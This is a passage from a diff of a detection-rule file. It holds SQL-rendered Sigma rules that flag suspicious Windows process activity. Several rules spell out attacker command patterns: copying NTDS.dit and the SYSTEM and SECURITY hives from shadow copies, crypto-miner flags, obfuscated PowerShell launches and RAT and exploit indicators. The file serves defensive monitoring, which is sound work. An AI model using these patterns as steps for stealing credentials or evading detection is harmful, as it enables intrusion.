'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": 